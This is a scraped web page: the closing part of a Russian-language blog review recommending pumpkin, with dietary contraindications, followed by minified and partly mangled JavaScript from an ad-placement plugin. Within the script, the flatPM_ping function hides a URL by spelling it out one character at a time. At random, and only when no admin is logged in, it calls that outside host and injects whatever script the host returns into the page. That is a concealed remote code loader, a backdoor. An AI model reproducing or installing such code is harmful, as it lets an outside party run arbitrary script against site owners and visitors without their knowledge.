Это восхитительно аппетитно и незабываемо.

Рекомендую ли?

Да, дорогие читатели, я от души рекомендую употреблять тыкву всем, вне зависимости нравится вам ее вкус или нет, потому что вкус овоща легко может измениться в ту сторону, которая более желанна вам. Единственное «Но», так это то, что противопоказания тоже имеются.

Тыкву не стоит употреблять в пищу при крайних формах сахарного диабета; также тыкву следует употреблять с осторожностью при заболеваниях двенадцатиперстной кишки, язве желудка и гастрите с пониженной кислотностью.

В остальных случаях тыква настоящий кладезь пользы и, конечно, гастрономического удовольствия!

Спасибо за внимание. Надеюсь, что мой отзыв был вам полезен.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};